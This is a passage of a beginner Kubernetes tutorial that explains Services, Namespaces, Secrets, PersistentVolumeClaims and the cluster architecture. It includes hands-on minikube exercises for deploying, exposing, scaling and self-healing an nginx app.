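&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;apiVersion: v1
kind: Service
metadata:
  name: my-app
spec:
  selector:
    app: my-app          # routes to healthy Pods carrying this label
  ports:
  - port: 80             # the Service's stable port
    targetPort: 80       # the containerPort on the Pods
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;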

&lt;h3&gt;
  
  
  Namespaces
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Namespaces&lt;/strong&gt; are virtual partitions within a cluster. They let you organize and isolate resources — commonly used to separate environments (dev/staging/prod), teams, or projects within the same physical cluster.&lt;/p&gt;
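
&lt;p&gt;Working with namespaces is a one-flag affair (assumes a running cluster):&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;kubectl create namespace staging

&lt;span class="c"&gt;# List Pods in one namespace, or across all of them&lt;/span&gt;
kubectl get pods -n staging
kubectl get pods --all-namespaces
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;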

&lt;h3&gt;
  
  
  ConfigMaps and Secrets
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;ConfigMap&lt;/strong&gt; — stores non-sensitive configuration data (e.g., environment variables, config files).&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Secret&lt;/strong&gt; — stores sensitive data (e.g., passwords, API keys). Stored base64-encoded in etcd; &lt;strong&gt;base64 is encoding, not encryption&lt;/strong&gt;.&lt;/li&gt;
&lt;/ul&gt;
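
&lt;p&gt;You can verify the "encoding, not encryption" point in one line — anyone who can read the Secret object can read the value (&lt;code&gt;hunter2&lt;/code&gt; is a throwaway example):&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# This is exactly what Kubernetes stores for a Secret value&lt;/span&gt;
echo -n 'hunter2' | base64          &lt;span class="c"&gt;# aHVudGVyMg==&lt;/span&gt;

&lt;span class="c"&gt;# ...and it decodes right back (use -D on older macOS)&lt;/span&gt;
echo -n 'aHVudGVyMg==' | base64 -d  &lt;span class="c"&gt;# hunter2&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;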

&lt;h3&gt;
  
  
  Volumes and PersistentVolumes
&lt;/h3&gt;

&lt;p&gt;Containers are stateless by default — their filesystem disappears when they stop. &lt;strong&gt;Volumes&lt;/strong&gt; attach storage to Pods. &lt;strong&gt;PersistentVolumes (PV)&lt;/strong&gt; are cluster-level storage resources that outlive individual Pods.&lt;/p&gt;
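
&lt;p&gt;In practice, a Pod doesn't reference a PersistentVolume directly — it asks for storage through a &lt;strong&gt;PersistentVolumeClaim&lt;/strong&gt;, and Kubernetes binds the claim to a matching PV. A minimal claim (name and size are illustrative):&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;apiVersion: v1
kind: PersistentVolumeClaim
metadata:
  name: my-data
spec:
  accessModes:
  - ReadWriteOnce          # mountable read-write by a single node
  resources:
    requests:
      storage: 1Gi         # ask for at least 1 GiB
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;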

&lt;h3&gt;
  
  
  Quick Vocabulary Reference
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Term&lt;/th&gt;
&lt;th&gt;One-liner&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Cluster&lt;/td&gt;
&lt;td&gt;The whole Kubernetes environment&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Node&lt;/td&gt;
&lt;td&gt;A machine in the cluster&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Pod&lt;/td&gt;
&lt;td&gt;One or more containers scheduled together&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Deployment&lt;/td&gt;
&lt;td&gt;Manages desired state and updates of Pods&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Service&lt;/td&gt;
&lt;td&gt;Stable network endpoint that routes to Pods&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Namespace&lt;/td&gt;
&lt;td&gt;Virtual partition within a cluster&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;ConfigMap&lt;/td&gt;
&lt;td&gt;Non-sensitive config data&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Secret&lt;/td&gt;
&lt;td&gt;Sensitive config data (base64-encoded at rest by default)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;PersistentVolume&lt;/td&gt;
&lt;td&gt;Storage that survives Pod restarts&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;





&lt;h2&gt;
  
  
  Part 3 — The Architecture: How It All Fits Together
&lt;/h2&gt;

&lt;h3&gt;
  
  
  The Big Picture
&lt;/h3&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fvpa4n85jizbw4i6htks1.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fvpa4n85jizbw4i6htks1.png" alt="image" width="800" height="438"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Control Plane Components
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;API Server (&lt;code&gt;kube-apiserver&lt;/code&gt;)&lt;/strong&gt;&lt;br&gt;
The front door to Kubernetes. Every command you run (via kubectl or any tool) goes through the API server over TLS. It validates requests, enforces authentication and authorization, and persists state to etcd.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;etcd&lt;/strong&gt;&lt;br&gt;
A distributed key-value store that holds the &lt;strong&gt;desired state&lt;/strong&gt; of the entire cluster — what resources exist, their configuration, and their status. If etcd is healthy &lt;em&gt;and&lt;/em&gt; you have functioning nodes and storage backends, Kubernetes can reconstruct all workloads from scratch because the desired state is fully preserved there. Note that etcd does not store your container images, PersistentVolume data, or node OS state — those live elsewhere.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Scheduler (&lt;code&gt;kube-scheduler&lt;/code&gt;)&lt;/strong&gt;&lt;br&gt;
Watches for newly created Pods that have no node assigned, then selects the best node to run them based on resource requests, node capacity, affinity rules, and other constraints.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Controller Manager (&lt;code&gt;kube-controller-manager&lt;/code&gt;)&lt;/strong&gt;&lt;br&gt;
Runs a collection of &lt;em&gt;controllers&lt;/em&gt; — background loops that watch the cluster state and take actions to move toward the desired state. The Deployment controller ensures the right number of Pod replicas are running. The Node controller notices when nodes go down. There are dozens of built-in controllers.&lt;/p&gt;
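
&lt;p&gt;On most clusters these components run as Pods themselves. With minikube you can list them (assumes a running cluster):&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Expect entries like etcd-minikube, kube-apiserver-minikube,&lt;/span&gt;
&lt;span class="c"&gt;# kube-scheduler-minikube, kube-controller-manager-minikube&lt;/span&gt;
kubectl get pods -n kube-system
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
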
&lt;h3&gt;
  
  
  Worker Node Components
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;kubelet&lt;/strong&gt;&lt;br&gt;
An agent that runs on every worker node. It watches the API server for Pods assigned to its node and instructs the container runtime to start or stop containers accordingly. It also reports Pod health back to the control plane.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;kube-proxy&lt;/strong&gt;&lt;br&gt;
Maintains network forwarding rules (traditionally via iptables or IPVS) on each node to implement Service routing. In modern clusters using eBPF-based networking (like &lt;a href="https://cilium.io/" rel="noopener noreferrer"&gt;Cilium&lt;/a&gt;), kube-proxy may be replaced entirely.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Container Runtime&lt;/strong&gt;&lt;br&gt;
The software that actually runs containers. Kubernetes uses the &lt;strong&gt;Container Runtime Interface (CRI)&lt;/strong&gt; to support multiple runtimes. The most common today are &lt;strong&gt;containerd&lt;/strong&gt; and &lt;strong&gt;CRI-O&lt;/strong&gt;. Kubernetes previously communicated with Docker via a compatibility shim called dockershim, which was removed in Kubernetes v1.24.&lt;/p&gt;
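
&lt;p&gt;You can check which runtime your own nodes use:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# The CONTAINER-RUNTIME column shows e.g. containerd://1.7.x&lt;/span&gt;
kubectl get nodes -o wide
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
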
&lt;h3&gt;
  
  
  The Reconciliation Loop (The Heart of Kubernetes)
&lt;/h3&gt;

&lt;p&gt;This is the single most important concept to internalize. Kubernetes is always running reconciliation loops — comparing desired state with actual state and taking corrective action.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fczsgbc3uizndsw4xirb8.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fczsgbc3uizndsw4xirb8.png" alt="image" width="800" height="151"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;This loop never stops. If a Pod crashes at 3am, the controller loop notices within seconds and creates a replacement — no human intervention required.&lt;/p&gt;
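
&lt;p&gt;You can watch the loop in action on any Deployment-managed Pod:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Delete a Pod that a Deployment manages...&lt;/span&gt;
kubectl delete pod &amp;lt;pod-name&amp;gt;

&lt;span class="c"&gt;# ...then watch: a replacement appears within seconds&lt;/span&gt;
kubectl get pods --watch
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;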



&lt;h2&gt;
  
  
  Part 4 — Hands-On: Your First Kubernetes App
&lt;/h2&gt;
&lt;h3&gt;
  
  
  Setting Up a Local Cluster
&lt;/h3&gt;

&lt;p&gt;You need a local Kubernetes environment. Pick one:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Tool&lt;/th&gt;
&lt;th&gt;Best for&lt;/th&gt;
&lt;th&gt;Link&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;minikube&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Beginners, most documentation&lt;/td&gt;
&lt;td&gt;&lt;a href="https://minikube.sigs.k8s.io/docs/start/" rel="noopener noreferrer"&gt;minikube.sigs.k8s.io&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;strong&gt;kind&lt;/strong&gt; (Kubernetes in Docker)&lt;/td&gt;
&lt;td&gt;Lightweight, CI-friendly&lt;/td&gt;
&lt;td&gt;&lt;a href="https://kind.sigs.k8s.io/" rel="noopener noreferrer"&gt;kind.sigs.k8s.io&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;k3d&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Fastest startup, uses k3s&lt;/td&gt;
&lt;td&gt;&lt;a href="https://k3d.io/" rel="noopener noreferrer"&gt;k3d.io&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;strong&gt;Docker Desktop&lt;/strong&gt; (built-in K8s)&lt;/td&gt;
&lt;td&gt;If you already have Docker Desktop&lt;/td&gt;
&lt;td&gt;Enable in Settings → Kubernetes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Rancher Desktop&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Open-source Docker Desktop alternative&lt;/td&gt;
&lt;td&gt;&lt;a href="https://rancherdesktop.io/" rel="noopener noreferrer"&gt;rancherdesktop.io&lt;/a&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;You'll also need &lt;code&gt;kubectl&lt;/code&gt; — the command-line tool to interact with Kubernetes:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://kubernetes.io/docs/tasks/tools/" rel="noopener noreferrer"&gt;Install kubectl&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;
  
  
  Exercise 1: Start Your Cluster
&lt;/h3&gt;


&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# With minikube&lt;/span&gt;
minikube start

&lt;span class="c"&gt;# Verify your cluster is running&lt;/span&gt;
kubectl cluster-info

&lt;span class="c"&gt;# See your nodes&lt;/span&gt;
kubectl get nodes
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;Expected output of &lt;code&gt;kubectl get nodes&lt;/code&gt; (the version number will vary):&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;NAME       STATUS   ROLES           AGE   VERSION
minikube   Ready    control-plane   1m    v1.28.0
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Exercise 2: Deploy Your First App
&lt;/h3&gt;

&lt;p&gt;Let's deploy a simple web server (nginx):&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Create a deployment&lt;/span&gt;
kubectl create deployment my-nginx &lt;span class="nt"&gt;--image&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;nginx

&lt;span class="c"&gt;# Check it's running&lt;/span&gt;
kubectl get deployments
kubectl get pods
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;You should see a Pod with a status of &lt;code&gt;Running&lt;/code&gt;.&lt;/p&gt;

&lt;h3&gt;
  
  
  Exercise 3: Expose It as a Service
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Expose the deployment as a service&lt;/span&gt;
kubectl expose deployment my-nginx &lt;span class="nt"&gt;--port&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;80 &lt;span class="nt"&gt;--type&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;NodePort

&lt;span class="c"&gt;# Get the URL (minikube only)&lt;/span&gt;
minikube service my-nginx &lt;span class="nt"&gt;--url&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Open the URL in your browser — you'll see the nginx welcome page. 🎉&lt;/p&gt;

&lt;h3&gt;
  
  
  Exercise 4: Explore with kubectl
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Describe a pod (get detailed info, including Events)&lt;/span&gt;
kubectl describe pod &amp;lt;pod-name&amp;gt;

&lt;span class="c"&gt;# View logs&lt;/span&gt;
kubectl logs &amp;lt;pod-name&amp;gt;

&lt;span class="c"&gt;# Get a shell inside a running container&lt;/span&gt;
kubectl &lt;span class="nb"&gt;exec&lt;/span&gt; &lt;span class="nt"&gt;-it&lt;/span&gt; &amp;lt;pod-name&amp;gt; &lt;span class="nt"&gt;--&lt;/span&gt; /bin/bash

&lt;span class="c"&gt;# Delete everything you created&lt;/span&gt;
kubectl delete deployment my-nginx
kubectl delete service my-nginx
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Understanding kubectl Syntax
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;kubectl [command] [resource-type] [resource-name] [flags]

kubectl    get       pods          my-nginx-xxx    -n default
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Common commands: &lt;code&gt;get&lt;/code&gt;, &lt;code&gt;describe&lt;/code&gt;, &lt;code&gt;create&lt;/code&gt;, &lt;code&gt;apply&lt;/code&gt;, &lt;code&gt;delete&lt;/code&gt;, &lt;code&gt;logs&lt;/code&gt;, &lt;code&gt;exec&lt;/code&gt;&lt;/p&gt;





&lt;h2&gt;
  
  
  Part 5 — Deployments, Scaling, and Self-Healing
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Writing YAML (Declarative Configuration)
&lt;/h3&gt;

&lt;p&gt;So far we've used imperative commands (&lt;code&gt;kubectl create&lt;/code&gt;). The Kubernetes way is &lt;strong&gt;declarative&lt;/strong&gt; — you write a YAML file describing desired state, and Kubernetes makes it real and keeps it that way.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fw5701yyt5b77dppawxtr.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fw5701yyt5b77dppawxtr.png" alt="image" width="800" height="88"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Here's a Deployment YAML with explanations:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# deployment.yaml&lt;/span&gt;
&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;apps/v1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Deployment&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;my-app&lt;/span&gt;
  &lt;span class="na"&gt;labels&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;app&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;my-app&lt;/span&gt;
&lt;span class="na"&gt;spec&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;replicas&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;3&lt;/span&gt;                    &lt;span class="c1"&gt;# Desired number of Pod copies&lt;/span&gt;
  &lt;span class="na"&gt;selector&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;matchLabels&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;app&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;my-app&lt;/span&gt;                &lt;span class="c1"&gt;# Manages Pods with this label&lt;/span&gt;
  &lt;span class="na"&gt;strategy&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;type&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;RollingUpdate&lt;/span&gt;
    &lt;span class="na"&gt;rollingUpdate&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;maxUnavailable&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;25%&lt;/span&gt;        &lt;span class="c1"&gt;# Max pods that can be down during update&lt;/span&gt;
      &lt;span class="na"&gt;maxSurge&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;25%&lt;/span&gt;              &lt;span class="c1"&gt;# Max extra pods allowed during update&lt;/span&gt;
  &lt;span class="na"&gt;template&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;                      &lt;span class="c1"&gt;# Pod template&lt;/span&gt;
    &lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;labels&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="na"&gt;app&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;my-app&lt;/span&gt;
    &lt;span class="na"&gt;spec&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;containers&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;my-app&lt;/span&gt;
        &lt;span class="na"&gt;image&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;nginx:1.25&lt;/span&gt;
        &lt;span class="na"&gt;ports&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
        &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;containerPort&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;80&lt;/span&gt;
        &lt;span class="na"&gt;resources&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
          &lt;span class="na"&gt;requests&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;              &lt;span class="c1"&gt;# Used by Scheduler to pick a node&lt;/span&gt;
            &lt;span class="na"&gt;memory&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;64Mi"&lt;/span&gt;
            &lt;span class="na"&gt;cpu&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;250m"&lt;/span&gt;
          &lt;span class="na"&gt;limits&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;                &lt;span class="c1"&gt;# Enforced at runtime by kubelet&lt;/span&gt;
            &lt;span class="na"&gt;memory&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;128Mi"&lt;/span&gt;
            &lt;span class="na"&gt;cpu&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;500m"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Resource Requests vs Limits — An Important Distinction
&lt;/h3&gt;

&lt;p&gt;These two fields are frequently confused but serve very different purposes:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fsvmb837kypdj68r1mm4u.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fsvmb837kypdj68r1mm4u.png" alt="image" width="800" height="510"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Always set resource requests.&lt;/strong&gt; Without them, the scheduler has no information to make good placement decisions, and a single misbehaving app can starve other Pods on the same node.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h3&gt;
  
  
  Exercise 5: Apply a Deployment
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Save the YAML above as deployment.yaml, then:&lt;/span&gt;
kubectl apply &lt;span class="nt"&gt;-f&lt;/span&gt; deployment.yaml

&lt;span class="c"&gt;# Watch Pods come to life&lt;/span&gt;
kubectl get pods &lt;span class="nt"&gt;--watch&lt;/span&gt;

&lt;span class="c"&gt;# See all 3 replicas&lt;/span&gt;
kubectl get pods &lt;span class="nt"&gt;-l&lt;/span&gt; &lt;span class="nv"&gt;app&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;my-app
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Exercise 6: Self-Healing in Action
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Delete one of the pods manually&lt;/span&gt;
kubectl delete pod &amp;lt;one-of-your-pod-names&amp;gt;

&lt;span class="c"&gt;# Watch Kubernetes immediately create a replacement&lt;/span&gt;
kubectl get pods &lt;span class="nt"&gt;--watch&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Within seconds, a new Pod appears. This is self-healing — the controller loop noticed the gap between desired state (3 replicas) and actual state (2 replicas) and corrected it.&lt;/p&gt;
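The reconciliation idea is simple enough to sketch in a few lines of Python. This is a toy model, not the real ReplicaSet controller (which is event-driven and far more involved): the loop compares the desired replica count against what it observes and emits actions to close the gap.

```python
# Toy model of a replica-count reconcile loop (illustration only;
# the real controller watches the API server rather than polling).

def reconcile(desired: int, observed_pods: list) -> list:
    """Return the actions needed to converge observed state to desired."""
    diff = desired - len(observed_pods)
    if diff > 0:
        # Fewer Pods than desired: create replacements.
        return [("create", i) for i in range(diff)]
    if diff < 0:
        # More Pods than desired: delete the surplus.
        return [("delete", pod) for pod in observed_pods[:(-diff)]]
    return []  # already converged

# One Pod was just deleted out from under a 3-replica Deployment:
actions = reconcile(3, ["my-app-abc", "my-app-def"])
print(actions)  # a single "create" action restores the third replica
```

Deleting a Pod by hand is exactly this scenario: observed drops to 2, desired stays 3, and the next pass of the loop creates a replacement.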

&lt;h3&gt;
  
  
  Exercise 7: Scaling
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Scale up to 5 replicas&lt;/span&gt;
kubectl scale deployment my-app &lt;span class="nt"&gt;--replicas&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;5
kubectl get pods

&lt;span class="c"&gt;# Or edit the YAML: change replicas: 3 to replicas: 5, then:&lt;/span&gt;
kubectl apply &lt;span class="nt"&gt;-f&lt;/span&gt; deployment.yaml   &lt;span class="c"&gt;# The declarative way&lt;/span&gt;

&lt;span class="c"&gt;# Scale back down&lt;/span&gt;
kubectl scale deployment my-app &lt;span class="nt"&gt;--replicas&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;2
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Rolling Updates: Zero Downtime Deploys
&lt;/h3&gt;

&lt;p&gt;When you update a Deployment (e.g., a new image version), Kubernetes performs a rolling update controlled by &lt;code&gt;maxUnavailable&lt;/code&gt; and &lt;code&gt;maxSurge&lt;/code&gt;. With 3 replicas and both set to 25%, &lt;code&gt;maxSurge&lt;/code&gt; rounds &lt;em&gt;up&lt;/em&gt; to 1 extra Pod while &lt;code&gt;maxUnavailable&lt;/code&gt; rounds &lt;em&gt;down&lt;/em&gt; to 0, so Kubernetes brings up one new Pod before taking an old one down. The actual behavior looks like this:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fcjtiwtee1k0bz8ofvw9u.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fcjtiwtee1k0bz8ofvw9u.png" alt="image" width="800" height="703"&gt;&lt;/a&gt;&lt;/p&gt;

